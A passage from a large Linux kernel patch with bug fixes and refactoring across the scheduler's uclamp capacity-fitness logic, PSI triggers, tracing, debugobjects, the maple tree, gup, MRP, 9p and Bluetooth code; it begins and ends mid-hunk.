++	 *
++	 *   which is what we're enforcing here. A task always fits if
++	 *   uclamp_max <= capacity_orig. But when uclamp_max > capacity_orig,
++	 *   the normal upmigration rules should withhold still.
++	 *
++	 *   Only exception is when we are on max capacity, then we need to be
++	 *   careful not to block overutilized state. This is so because:
++	 *
++	 *     1. There's no concept of capping at max_capacity! We can't go
++	 *        beyond this performance level anyway.
++	 *     2. The system is being saturated when we're operating near
++	 *        max capacity, it doesn't make sense to block overutilized.
++	 */
++	uclamp_max_fits = (capacity_orig == SCHED_CAPACITY_SCALE) && (uclamp_max == SCHED_CAPACITY_SCALE);
++	uclamp_max_fits = !uclamp_max_fits && (uclamp_max <= capacity_orig);
++	fits = fits || uclamp_max_fits;
++
++	/*
++	 *
++	 *                                 C=z
++	 *   |                             ___       (region a, capped, util >= uclamp_max)
++	 *   |                  C=y       |   |
++	 *   |_ _ _ _ _ _ _ _ _ ___ _ _ _ | _ | _ _ _ _ _ uclamp_max
++	 *   |      C=x        |   |      |   |
++	 *   |      ___        |   |      |   |      (region b, uclamp_min <= util <= uclamp_max)
++	 *   |_ _ _|_ _|_ _ _ _| _ | _ _ _| _ | _ _ _ _ _ uclamp_min
++	 *   |     |   |       |   |      |   |
++	 *   |     |   |       |   |      |   |      (region c, boosted, util < uclamp_min)
++	 *   +----------------------------------------
++	 *         cpu0        cpu1       cpu2
++	 *
++	 * a) If util > uclamp_max, then we're capped, we don't care about
++	 *    actual fitness value here. We only care if uclamp_max fits
++	 *    capacity without taking margin/pressure into account.
++	 *    See comment above.
++	 *
++	 * b) If uclamp_min <= util <= uclamp_max, then the normal
++	 *    fits_capacity() rules apply. Except we need to ensure that we
++	 *    enforce we remain within uclamp_max, see comment above.
++	 *
++	 * c) If util < uclamp_min, then we are boosted. Same as (b) but we
++	 *    need to take into account the boosted value fits the CPU without
++	 *    taking margin/pressure into account.
++	 *
++	 * Cases (a) and (b) are handled in the 'fits' variable already. We
++	 * just need to consider an extra check for case (c) after ensuring we
++	 * handle the case uclamp_min > uclamp_max.
++	 */
++	uclamp_min = min(uclamp_min, uclamp_max);
++	if (util < uclamp_min && capacity_orig != SCHED_CAPACITY_SCALE)
++		fits = fits && (uclamp_min <= capacity_orig_thermal);
++
++	return fits;
++}
++
++static inline int task_fits_cpu(struct task_struct *p, int cpu)
++{
++	unsigned long uclamp_min = uclamp_eff_value(p, UCLAMP_MIN);
++	unsigned long uclamp_max = uclamp_eff_value(p, UCLAMP_MAX);
++	unsigned long util = task_util_est(p);
++	return util_fits_cpu(util, uclamp_min, uclamp_max, cpu);
+ }
+ 
+ static inline void update_misfit_status(struct task_struct *p, struct rq *rq)
+@@ -4442,7 +4569,7 @@ static inline void update_misfit_status(struct task_struct *p, struct rq *rq)
+ 		return;
+ 	}
+ 
+-	if (task_fits_capacity(p, capacity_of(cpu_of(rq)))) {
++	if (task_fits_cpu(p, cpu_of(rq))) {
+ 		rq->misfit_task_load = 0;
+ 		return;
+ 	}
+@@ -5862,7 +5989,10 @@ static inline void hrtick_update(struct rq *rq)
+ #ifdef CONFIG_SMP
+ static inline bool cpu_overutilized(int cpu)
+ {
+-	return !fits_capacity(cpu_util_cfs(cpu), capacity_of(cpu));
++	unsigned long rq_util_min = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MIN);
++	unsigned long rq_util_max = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MAX);
++
++	return !util_fits_cpu(cpu_util_cfs(cpu), rq_util_min, rq_util_max, cpu);
+ }
+ 
+ static inline void update_overutilized_status(struct rq *rq)
+@@ -6654,21 +6784,23 @@ static int select_idle_cpu(struct task_struct *p, struct sched_domain *sd, bool
+ static int
+ select_idle_capacity(struct task_struct *p, struct sched_domain *sd, int target)
+ {
+-	unsigned long task_util, best_cap = 0;
++	unsigned long task_util, util_min, util_max, best_cap = 0;
+ 	int cpu, best_cpu = -1;
+ 	struct cpumask *cpus;
+ 
+ 	cpus = this_cpu_cpumask_var_ptr(select_rq_mask);
+ 	cpumask_and(cpus, sched_domain_span(sd), p->cpus_ptr);
+ 
+-	task_util = uclamp_task_util(p);
++	task_util = task_util_est(p);
++	util_min = uclamp_eff_value(p, UCLAMP_MIN);
++	util_max = uclamp_eff_value(p, UCLAMP_MAX);
+ 
+ 	for_each_cpu_wrap(cpu, cpus, target) {
+ 		unsigned long cpu_cap = capacity_of(cpu);
+ 
+ 		if (!available_idle_cpu(cpu) && !sched_idle_cpu(cpu))
+ 			continue;
+-		if (fits_capacity(task_util, cpu_cap))
++		if (util_fits_cpu(task_util, util_min, util_max, cpu))
+ 			return cpu;
+ 
+ 		if (cpu_cap > best_cap) {
+@@ -6680,10 +6812,13 @@ select_idle_capacity(struct task_struct *p, struct sched_domain *sd, int target)
+ 	return best_cpu;
+ }
+ 
+-static inline bool asym_fits_capacity(unsigned long task_util, int cpu)
++static inline bool asym_fits_cpu(unsigned long util,
++				 unsigned long util_min,
++				 unsigned long util_max,
++				 int cpu)
+ {
+ 	if (sched_asym_cpucap_active())
+-		return fits_capacity(task_util, capacity_of(cpu));
++		return util_fits_cpu(util, util_min, util_max, cpu);
+ 
+ 	return true;
+ }
+@@ -6695,7 +6830,7 @@ static int select_idle_sibling(struct task_struct *p, int prev, int target)
+ {
+ 	bool has_idle_core = false;
+ 	struct sched_domain *sd;
+-	unsigned long task_util;
++	unsigned long task_util, util_min, util_max;
+ 	int i, recent_used_cpu;
+ 
+ 	/*
+@@ -6704,7 +6839,9 @@ static int select_idle_sibling(struct task_struct *p, int prev, int target)
+ 	 */
+ 	if (sched_asym_cpucap_active()) {
+ 		sync_entity_load_avg(&p->se);
+-		task_util = uclamp_task_util(p);
++		task_util = task_util_est(p);
++		util_min = uclamp_eff_value(p, UCLAMP_MIN);
++		util_max = uclamp_eff_value(p, UCLAMP_MAX);
+ 	}
+ 
+ 	/*
+@@ -6713,7 +6850,7 @@ static int select_idle_sibling(struct task_struct *p, int prev, int target)
+ 	lockdep_assert_irqs_disabled();
+ 
+ 	if ((available_idle_cpu(target) || sched_idle_cpu(target)) &&
+-	    asym_fits_capacity(task_util, target))
++	    asym_fits_cpu(task_util, util_min, util_max, target))
+ 		return target;
+ 
+ 	/*
+@@ -6721,7 +6858,7 @@ static int select_idle_sibling(struct task_struct *p, int prev, int target)
+ 	 */
+ 	if (prev != target && cpus_share_cache(prev, target) &&
+ 	    (available_idle_cpu(prev) || sched_idle_cpu(prev)) &&
+-	    asym_fits_capacity(task_util, prev))
++	    asym_fits_cpu(task_util, util_min, util_max, prev))
+ 		return prev;
+ 
+ 	/*
+@@ -6736,7 +6873,7 @@ static int select_idle_sibling(struct task_struct *p, int prev, int target)
+ 	    in_task() &&
+ 	    prev == smp_processor_id() &&
+ 	    this_rq()->nr_running <= 1 &&
+-	    asym_fits_capacity(task_util, prev)) {
++	    asym_fits_cpu(task_util, util_min, util_max, prev)) {
+ 		return prev;
+ 	}
+ 
+@@ -6748,7 +6885,7 @@ static int select_idle_sibling(struct task_struct *p, int prev, int target)
+ 	    cpus_share_cache(recent_used_cpu, target) &&
+ 	    (available_idle_cpu(recent_used_cpu) || sched_idle_cpu(recent_used_cpu)) &&
+ 	    cpumask_test_cpu(p->recent_used_cpu, p->cpus_ptr) &&
+-	    asym_fits_capacity(task_util, recent_used_cpu)) {
++	    asym_fits_cpu(task_util, util_min, util_max, recent_used_cpu)) {
+ 		return recent_used_cpu;
+ 	}
+ 
+@@ -7044,6 +7181,8 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ {
+ 	struct cpumask *cpus = this_cpu_cpumask_var_ptr(select_rq_mask);
+ 	unsigned long prev_delta = ULONG_MAX, best_delta = ULONG_MAX;
++	unsigned long p_util_min = uclamp_is_used() ? uclamp_eff_value(p, UCLAMP_MIN) : 0;
++	unsigned long p_util_max = uclamp_is_used() ? uclamp_eff_value(p, UCLAMP_MAX) : 1024;
+ 	struct root_domain *rd = this_rq()->rd;
+ 	int cpu, best_energy_cpu, target = -1;
+ 	struct sched_domain *sd;
+@@ -7068,7 +7207,7 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 	target = prev_cpu;
+ 
+ 	sync_entity_load_avg(&p->se);
+-	if (!task_util_est(p))
++	if (!uclamp_task_util(p, p_util_min, p_util_max))
+ 		goto unlock;
+ 
+ 	eenv_task_busy_time(&eenv, p, prev_cpu);
+@@ -7076,6 +7215,8 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 	for (; pd; pd = pd->next) {
+ 		unsigned long cpu_cap, cpu_thermal_cap, util;
+ 		unsigned long cur_delta, max_spare_cap = 0;
++		unsigned long rq_util_min, rq_util_max;
++		unsigned long util_min, util_max;
+ 		bool compute_prev_delta = false;
+ 		int max_spare_cap_cpu = -1;
+ 		unsigned long base_energy;
+@@ -7112,8 +7253,26 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 			 * much capacity we can get out of the CPU; this is
+ 			 * aligned with sched_cpu_util().
+ 			 */
+-			util = uclamp_rq_util_with(cpu_rq(cpu), util, p);
+-			if (!fits_capacity(util, cpu_cap))
++			if (uclamp_is_used()) {
++				if (uclamp_rq_is_idle(cpu_rq(cpu))) {
++					util_min = p_util_min;
++					util_max = p_util_max;
++				} else {
++					/*
++					 * Open code uclamp_rq_util_with() except for
++					 * the clamp() part. Ie: apply max aggregation
++					 * only. util_fits_cpu() logic requires to
++					 * operate on non clamped util but must use the
++					 * max-aggregated uclamp_{min, max}.
++					 */
++					rq_util_min = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MIN);
++					rq_util_max = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MAX);
++
++					util_min = max(rq_util_min, p_util_min);
++					util_max = max(rq_util_max, p_util_max);
++				}
++			}
++			if (!util_fits_cpu(util, util_min, util_max, cpu))
+ 				continue;
+ 
+ 			lsub_positive(&cpu_cap, util);
+@@ -8276,7 +8435,7 @@ static int detach_tasks(struct lb_env *env)
+ 
+ 		case migrate_misfit:
+ 			/* This is not a misfit task */
+-			if (task_fits_capacity(p, capacity_of(env->src_cpu)))
++			if (task_fits_cpu(p, env->src_cpu))
+ 				goto next;
+ 
+ 			env->imbalance = 0;
+@@ -9281,6 +9440,10 @@ static inline void update_sg_wakeup_stats(struct sched_domain *sd,
+ 
+ 	memset(sgs, 0, sizeof(*sgs));
+ 
++	/* Assume that task can't fit any CPU of the group */
++	if (sd->flags & SD_ASYM_CPUCAPACITY)
++		sgs->group_misfit_task_load = 1;
++
+ 	for_each_cpu(i, sched_group_span(group)) {
+ 		struct rq *rq = cpu_rq(i);
+ 		unsigned int local;
+@@ -9300,12 +9463,12 @@ static inline void update_sg_wakeup_stats(struct sched_domain *sd,
+ 		if (!nr_running && idle_cpu_without(i, p))
+ 			sgs->idle_cpus++;
+ 
+-	}
++		/* Check if task fits in the CPU */
++		if (sd->flags & SD_ASYM_CPUCAPACITY &&
++		    sgs->group_misfit_task_load &&
++		    task_fits_cpu(p, i))
++			sgs->group_misfit_task_load = 0;
+ 
+-	/* Check if task fits in the group */
+-	if (sd->flags & SD_ASYM_CPUCAPACITY &&
+-	    !task_fits_capacity(p, group->sgc->max_capacity)) {
+-		sgs->group_misfit_task_load = 1;
+ 	}
+ 
+ 	sgs->group_capacity = group->sgc->capacity;
+diff --git a/kernel/sched/psi.c b/kernel/sched/psi.c
+index ee2ecc081422e..7f40d87e8f509 100644
+--- a/kernel/sched/psi.c
++++ b/kernel/sched/psi.c
+@@ -539,10 +539,12 @@ static u64 update_triggers(struct psi_group *group, u64 now)
+ 
+ 			/* Calculate growth since last update */
+ 			growth = window_update(&t->win, now, total[t->state]);
+-			if (growth < t->threshold)
+-				continue;
++			if (!t->pending_event) {
++				if (growth < t->threshold)
++					continue;
+ 
+-			t->pending_event = true;
++				t->pending_event = true;
++			}
+ 		}
+ 		/* Limit event signaling to once per window */
+ 		if (now < t->last_event_time + t->win.size)
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index a4a20046e586e..d6d488e8eb554 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -2979,6 +2979,23 @@ static inline unsigned long cpu_util_rt(struct rq *rq)
+ #ifdef CONFIG_UCLAMP_TASK
+ unsigned long uclamp_eff_value(struct task_struct *p, enum uclamp_id clamp_id);
+ 
++static inline unsigned long uclamp_rq_get(struct rq *rq,
++					  enum uclamp_id clamp_id)
++{
++	return READ_ONCE(rq->uclamp[clamp_id].value);
++}
++
++static inline void uclamp_rq_set(struct rq *rq, enum uclamp_id clamp_id,
++				 unsigned int value)
++{
++	WRITE_ONCE(rq->uclamp[clamp_id].value, value);
++}
++
++static inline bool uclamp_rq_is_idle(struct rq *rq)
++{
++	return rq->uclamp_flags & UCLAMP_FLAG_IDLE;
++}
++
+ /**
+  * uclamp_rq_util_with - clamp @util with @rq and @p effective uclamp values.
+  * @rq:		The rq to clamp against. Must not be NULL.
+@@ -3014,12 +3031,12 @@ unsigned long uclamp_rq_util_with(struct rq *rq, unsigned long util,
+ 		 * Ignore last runnable task's max clamp, as this task will
+ 		 * reset it. Similarly, no need to read the rq's min clamp.
+ 		 */
+-		if (rq->uclamp_flags & UCLAMP_FLAG_IDLE)
++		if (uclamp_rq_is_idle(rq))
+ 			goto out;
+ 	}
+ 
+-	min_util = max_t(unsigned long, min_util, READ_ONCE(rq->uclamp[UCLAMP_MIN].value));
+-	max_util = max_t(unsigned long, max_util, READ_ONCE(rq->uclamp[UCLAMP_MAX].value));
++	min_util = max_t(unsigned long, min_util, uclamp_rq_get(rq, UCLAMP_MIN));
++	max_util = max_t(unsigned long, max_util, uclamp_rq_get(rq, UCLAMP_MAX));
+ out:
+ 	/*
+ 	 * Since CPU's {min,max}_util clamps are MAX aggregated considering
+@@ -3060,6 +3077,15 @@ static inline bool uclamp_is_used(void)
+ 	return static_branch_likely(&sched_uclamp_used);
+ }
+ #else /* CONFIG_UCLAMP_TASK */
++static inline unsigned long uclamp_eff_value(struct task_struct *p,
++					     enum uclamp_id clamp_id)
++{
++	if (clamp_id == UCLAMP_MIN)
++		return 0;
++
++	return SCHED_CAPACITY_SCALE;
++}
++
+ static inline
+ unsigned long uclamp_rq_util_with(struct rq *rq, unsigned long util,
+ 				  struct task_struct *p)
+@@ -3073,6 +3099,25 @@ static inline bool uclamp_is_used(void)
+ {
+ 	return false;
+ }
++
++static inline unsigned long uclamp_rq_get(struct rq *rq,
++					  enum uclamp_id clamp_id)
++{
++	if (clamp_id == UCLAMP_MIN)
++		return 0;
++
++	return SCHED_CAPACITY_SCALE;
++}
++
++static inline void uclamp_rq_set(struct rq *rq, enum uclamp_id clamp_id,
++				 unsigned int value)
++{
++}
++
++static inline bool uclamp_rq_is_idle(struct rq *rq)
++{
++	return false;
++}
+ #endif /* CONFIG_UCLAMP_TASK */
+ 
+ #ifdef CONFIG_HAVE_SCHED_AVG_IRQ
+diff --git a/kernel/trace/blktrace.c b/kernel/trace/blktrace.c
+index a995ea1ef849a..a66cff5a18579 100644
+--- a/kernel/trace/blktrace.c
++++ b/kernel/trace/blktrace.c
+@@ -1548,7 +1548,8 @@ blk_trace_event_print_binary(struct trace_iterator *iter, int flags,
+ 
+ static enum print_line_t blk_tracer_print_line(struct trace_iterator *iter)
+ {
+-	if (!(blk_tracer_flags.val & TRACE_BLK_OPT_CLASSIC))
++	if ((iter->ent->type != TRACE_BLK) ||
++	    !(blk_tracer_flags.val & TRACE_BLK_OPT_CLASSIC))
+ 		return TRACE_TYPE_UNHANDLED;
+ 
+ 	return print_one_line(iter, true);
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index 1c82478e8dffe..b6e5724a9ea35 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -6438,7 +6438,7 @@ enable:
+ 	if (se)
+ 		se->ref++;
+  out:
+-	if (ret == 0)
++	if (ret == 0 && glob[0])
+ 		hist_err_clear();
+ 
+ 	return ret;
+diff --git a/kernel/trace/trace_events_user.c b/kernel/trace/trace_events_user.c
+index 539b08ae70207..9cb53182bb31c 100644
+--- a/kernel/trace/trace_events_user.c
++++ b/kernel/trace/trace_events_user.c
+@@ -1359,6 +1359,7 @@ put_user_lock:
+ put_user:
+ 	user_event_destroy_fields(user);
+ 	user_event_destroy_validators(user);
++	kfree(user->call.print_fmt);
+ 	kfree(user);
+ 	return ret;
+ }
+diff --git a/lib/debugobjects.c b/lib/debugobjects.c
+index 337d797a71416..6f8e5dd1dcd0c 100644
+--- a/lib/debugobjects.c
++++ b/lib/debugobjects.c
+@@ -437,6 +437,7 @@ static int object_cpu_offline(unsigned int cpu)
+ 	struct debug_percpu_free *percpu_pool;
+ 	struct hlist_node *tmp;
+ 	struct debug_obj *obj;
++	unsigned long flags;
+ 
+ 	/* Remote access is safe as the CPU is dead already */
+ 	percpu_pool = per_cpu_ptr(&percpu_obj_pool, cpu);
+@@ -444,6 +445,12 @@ static int object_cpu_offline(unsigned int cpu)
+ 		hlist_del(&obj->node);
+ 		kmem_cache_free(obj_cache, obj);
+ 	}
++
++	raw_spin_lock_irqsave(&pool_lock, flags);
++	obj_pool_used -= percpu_pool->obj_free;
++	debug_objects_freed += percpu_pool->obj_free;
++	raw_spin_unlock_irqrestore(&pool_lock, flags);
++
+ 	percpu_pool->obj_free = 0;
+ 
+ 	return 0;
+@@ -1318,6 +1325,8 @@ static int __init debug_objects_replace_static_objects(void)
+ 		hlist_add_head(&obj->node, &objects);
+ 	}
+ 
++	debug_objects_allocated += i;
++
+ 	/*
+ 	 * debug_objects_mem_init() is now called early that only one CPU is up
+ 	 * and interrupts have been disabled, so it is safe to replace the
+@@ -1386,6 +1395,7 @@ void __init debug_objects_mem_init(void)
+ 		debug_objects_enabled = 0;
+ 		kmem_cache_destroy(obj_cache);
+ 		pr_warn("out of memory.\n");
++		return;
+ 	} else
+ 		debug_objects_selftest();
+ 
+diff --git a/lib/fonts/fonts.c b/lib/fonts/fonts.c
+index 5f4b07b56cd9c..9738664386088 100644
+--- a/lib/fonts/fonts.c
++++ b/lib/fonts/fonts.c
+@@ -135,8 +135,8 @@ const struct font_desc *get_default_font(int xres, int yres, u32 font_w,
+ 		if (res > 20)
+ 			c += 20 - res;
+ 
+-		if ((font_w & (1 << (f->width - 1))) &&
+-		    (font_h & (1 << (f->height - 1))))
++		if ((font_w & (1U << (f->width - 1))) &&
++		    (font_h & (1U << (f->height - 1))))
+ 			c += 1000;
+ 
+ 		if (c > cc) {
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index df352f6ccc240..fe21bf276d91c 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -2989,7 +2989,9 @@ static int mas_spanning_rebalance(struct ma_state *mas,
+ 	mast->free = &free;
+ 	mast->destroy = &destroy;
+ 	l_mas.node = r_mas.node = m_mas.node = MAS_NONE;
+-	if (!(mast->orig_l->min && mast->orig_r->max == ULONG_MAX) &&
++
++	/* Check if this is not root and has sufficient data.  */
++	if (((mast->orig_l->min != 0) || (mast->orig_r->max != ULONG_MAX)) &&
+ 	    unlikely(mast->bn->b_end <= mt_min_slots[mast->bn->type]))
+ 		mast_spanning_rebalance(mast);
+ 
+diff --git a/lib/notifier-error-inject.c b/lib/notifier-error-inject.c
+index 21016b32d3131..2b24ea6c94979 100644
+--- a/lib/notifier-error-inject.c
++++ b/lib/notifier-error-inject.c
+@@ -15,7 +15,7 @@ static int debugfs_errno_get(void *data, u64 *val)
+ 	return 0;
+ }
+ 
+-DEFINE_SIMPLE_ATTRIBUTE(fops_errno, debugfs_errno_get, debugfs_errno_set,
++DEFINE_SIMPLE_ATTRIBUTE_SIGNED(fops_errno, debugfs_errno_get, debugfs_errno_set,
+ 			"%lld\n");
+ 
+ static struct dentry *debugfs_create_errno(const char *name, umode_t mode,
+diff --git a/lib/test_firmware.c b/lib/test_firmware.c
+index c82b65947ce68..1c5a2adb16ef5 100644
+--- a/lib/test_firmware.c
++++ b/lib/test_firmware.c
+@@ -1491,6 +1491,7 @@ static int __init test_firmware_init(void)
+ 
+ 	rc = misc_register(&test_fw_misc_device);
+ 	if (rc) {
++		__test_firmware_config_free();
+ 		kfree(test_fw_config);
+ 		pr_err("could not register misc device: %d\n", rc);
+ 		return rc;
+diff --git a/lib/test_maple_tree.c b/lib/test_maple_tree.c
+index f425f169ef089..497fc93ccf9ec 100644
+--- a/lib/test_maple_tree.c
++++ b/lib/test_maple_tree.c
+@@ -2498,6 +2498,25 @@ static noinline void check_dup(struct maple_tree *mt)
+ 	}
+ }
+ 
++static noinline void check_bnode_min_spanning(struct maple_tree *mt)
++{
++	int i = 50;
++	MA_STATE(mas, mt, 0, 0);
++
++	mt_set_non_kernel(9999);
++	mas_lock(&mas);
++	do {
++		mas_set_range(&mas, i*10, i*10+9);
++		mas_store(&mas, check_bnode_min_spanning);
++	} while (i--);
++
++	mas_set_range(&mas, 240, 509);
++	mas_store(&mas, NULL);
++	mas_unlock(&mas);
++	mas_destroy(&mas);
++	mt_set_non_kernel(0);
++}
++
+ static DEFINE_MTREE(tree);
+ static int maple_tree_seed(void)
+ {
+@@ -2742,6 +2761,10 @@ static int maple_tree_seed(void)
+ 	check_dup(&tree);
+ 	mtree_destroy(&tree);
+ 
++	mt_init_flags(&tree, MT_FLAGS_ALLOC_RANGE);
++	check_bnode_min_spanning(&tree);
++	mtree_destroy(&tree);
++
+ #if defined(BENCH)
+ skip:
+ #endif
+diff --git a/mm/gup.c b/mm/gup.c
+index 3b7bc2c1fd44c..eb8d7baf9e4d3 100644
+--- a/mm/gup.c
++++ b/mm/gup.c
+@@ -1065,6 +1065,9 @@ static int check_vma_flags(struct vm_area_struct *vma, unsigned long gup_flags)
+ 		if (!(vm_flags & VM_WRITE)) {
+ 			if (!(gup_flags & FOLL_FORCE))
+ 				return -EFAULT;
++			/* hugetlb does not support FOLL_FORCE|FOLL_WRITE. */
++			if (is_vm_hugetlb_page(vma))
++				return -EFAULT;
+ 			/*
+ 			 * We used to let the write,force case do COW in a
+ 			 * VM_MAYWRITE VM_SHARED !VM_WRITE vma, so ptrace could
+diff --git a/net/802/mrp.c b/net/802/mrp.c
+index 155f74d8b14f4..6c927d4b35f06 100644
+--- a/net/802/mrp.c
++++ b/net/802/mrp.c
+@@ -606,7 +606,10 @@ static void mrp_join_timer(struct timer_list *t)
+ 	spin_unlock(&app->lock);
+ 
+ 	mrp_queue_xmit(app);
+-	mrp_join_timer_arm(app);
++	spin_lock(&app->lock);
++	if (likely(app->active))
++		mrp_join_timer_arm(app);
++	spin_unlock(&app->lock);
+ }
+ 
+ static void mrp_periodic_timer_arm(struct mrp_applicant *app)
+@@ -620,11 +623,12 @@ static void mrp_periodic_timer(struct timer_list *t)
+ 	struct mrp_applicant *app = from_timer(app, t, periodic_timer);
+ 
+ 	spin_lock(&app->lock);
+-	mrp_mad_event(app, MRP_EVENT_PERIODIC);
+-	mrp_pdu_queue(app);
++	if (likely(app->active)) {
++		mrp_mad_event(app, MRP_EVENT_PERIODIC);
++		mrp_pdu_queue(app);
++		mrp_periodic_timer_arm(app);
++	}
+ 	spin_unlock(&app->lock);
+-
+-	mrp_periodic_timer_arm(app);
+ }
+ 
+ static int mrp_pdu_parse_end_mark(struct sk_buff *skb, int *offset)
+@@ -872,6 +876,7 @@ int mrp_init_applicant(struct net_device *dev, struct mrp_application *appl)
+ 	app->dev = dev;
+ 	app->app = appl;
+ 	app->mad = RB_ROOT;
++	app->active = true;
+ 	spin_lock_init(&app->lock);
+ 	skb_queue_head_init(&app->queue);
+ 	rcu_assign_pointer(dev->mrp_port->applicants[appl->type], app);
+@@ -900,6 +905,9 @@ void mrp_uninit_applicant(struct net_device *dev, struct mrp_application *appl)
+ 
+ 	RCU_INIT_POINTER(port->applicants[appl->type], NULL);
+ 
++	spin_lock_bh(&app->lock);
++	app->active = false;
++	spin_unlock_bh(&app->lock);
+ 	/* Delete timer and generate a final TX event to flush out
+ 	 * all pending messages before the applicant is gone.
+ 	 */
+diff --git a/net/9p/client.c b/net/9p/client.c
+index aaa37b07e30a5..b554f8357f967 100644
+--- a/net/9p/client.c
++++ b/net/9p/client.c
+@@ -297,6 +297,11 @@ p9_tag_alloc(struct p9_client *c, int8_t type, uint t_size, uint r_size,
+ 	p9pdu_reset(&req->rc);
+ 	req->t_err = 0;
+ 	req->status = REQ_STATUS_ALLOC;
++	/* refcount needs to be set to 0 before inserting into the idr
++	 * so p9_tag_lookup does not accept a request that is not fully
++	 * initialized. refcount_set to 2 below will mark request ready.
++	 */
++	refcount_set(&req->refcount, 0);
+ 	init_waitqueue_head(&req->wq);
+ 	INIT_LIST_HEAD(&req->req_list);
+ 
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index a6c12863a2532..8aab2e882958c 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -1881,7 +1881,7 @@ static int hci_create_cis_sync(struct hci_dev *hdev, void *data)
+ 			continue;
+ 
+ 		/* Check if all CIS(s) belonging to a CIG are ready */
+-		if (conn->link->state != BT_CONNECTED ||
++		if (!conn->link || conn->link->state != BT_CONNECTED ||
+ 		    conn->state != BT_CONNECT) {
+ 			cmd.cp.num_cis = 0;
+ 			break;
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index d97fac4f71303..b65c3aabcd536 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -2660,7 +2660,7 @@ int hci_register_dev(struct hci_dev *hdev)
+ 
+ 	error = hci_register_suspend_notifier(hdev);
+ 	if (error)
+-		goto err_wqueue;
++		BT_WARN("register suspend notifier failed error:%d\n", error);
+ 
+ 	queue_work(hdev->req_workqueue, &hdev->power_on);
+ 
+@@ -3985,7 +3985,7 @@ void hci_req_cmd_complete(struct hci_dev *hdev, u16 opcode, u8 status,
+ 			*req_complete_skb = bt_cb(skb)->hci.req_complete_skb;
+ 		else
+ 			*req_complete = bt_cb(skb)->hci.req_complete;
+-		kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 	}
+ 	spin_unlock_irqrestore(&hdev->cmd_q.lock, flags);
+ }
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 1fc693122a47a..3a68d9bc43b8f 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -4261,7 +4261,7 @@ static int hci_read_local_pairing_opts_sync(struct hci_dev *hdev)
+ /* Get MWS transport configuration if the HCI command is supported */
+ static int hci_get_mws_transport_config_sync(struct hci_dev *hdev)
+ {
+-	if (!(hdev->commands[30] & 0x08))
++	if (!mws_transport_config_capable(hdev))
+ 		return 0;
+ 
+ 	return __hci_cmd_sync_status(hdev, HCI_OP_GET_MWS_TRANSPORT_CONFIG,
+diff --git a/net/bluetooth/lib.c b/net/bluetooth/lib.c
+index 469a0c95b6e8a..53a796ac078c3 100644
+--- a/net/bluetooth/lib.c
++++ b/net/bluetooth/lib.c
+@@ -170,7 +170,7 @@ __u8 bt_status(int err)
+ 	case -EMLINK:
+ 		return 0x09;
+ 
+-	case EALREADY:
++	case -EALREADY:
+ 		return 0x0b;
+ 
+ 	case -EBUSY:
+@@ -191,7 +191,7 @@ __u8 bt_status(int err)
+ 	case -ECONNABORTED:
+ 		return 0x16;
+ 
+-	case ELOOP:
++	case -ELOOP:
+ 		return 0x17;
+ 
+ 	case -EPROTONOSUPPORT:
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index a92e7e485feba..0dd30a3beb776 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -8859,7 +8859,7 @@ static int add_ext_adv_params(struct sock *sk, struct hci_dev *hdev,
+ 	 * extra parameters we don't know about will be ignored in this request.
+ 	 */
+ 	if (data_len < MGMT_ADD_EXT_ADV_PARAMS_MIN_SIZE)
+-		return mgmt_cmd_status(sk, hdev->id, MGMT_OP_ADD_ADVERTISING,
++		return mgmt_cmd_status(sk, hdev->id, MGMT_OP_ADD_EXT_ADV_PARAMS,
+ 				       MGMT_STATUS_INVALID_PARAMS);
+ 
+ 	flags = __le32_to_cpu(cp->flags);
+diff --git a/net/bluetooth/rfcomm/core.c b/net/bluetooth/rfcomm/core.c
+index 7324764384b67..8d6fce9005bdd 100644
+--- a/net/bluetooth/rfcomm/core.c
++++ b/net/bluetooth/rfcomm/core.c
+@@ -590,7 +590,7 @@ int rfcomm_dlc_send(struct rfcomm_dlc *d, struct sk_buff *skb)
+ 
+ 		ret = rfcomm_dlc_send_frag(d, frag);
+ 		if (ret < 0) {
+-			kfree_skb(frag);
++			dev_kfree_skb_irq(frag);
+ 			goto unlock;
+ 		}
+ 
+diff --git a/net/bpf/test_run.c b/net/bpf/test_run.c
+index fcb3e6c5e03c0..6094ef7cffcd2 100644
+--- a/net/bpf/test_run.c
++++ b/net/bpf/test_run.c
+@@ -980,9 +980,6 @@ static int convert___skb_to_skb(struct sk_buff *skb, struct __sk_buff *__skb)
+ {
+ 	struct qdisc_skb_cb *cb = (struct qdisc_skb_cb *)skb->cb;
+ 
+-	if (!skb->len)
+-		return -EINVAL;
+-
+ 	if (!__skb)
+ 		return 0;
+ 
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 3be256051e99b..70e06853ba255 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -10379,24 +10379,16 @@ void netdev_run_todo(void)
+ void netdev_stats_to_stats64(struct rtnl_link_stats64 *stats64,
+ 			     const struct net_device_stats *netdev_stats)
+ {
+-#if BITS_PER_LONG == 64
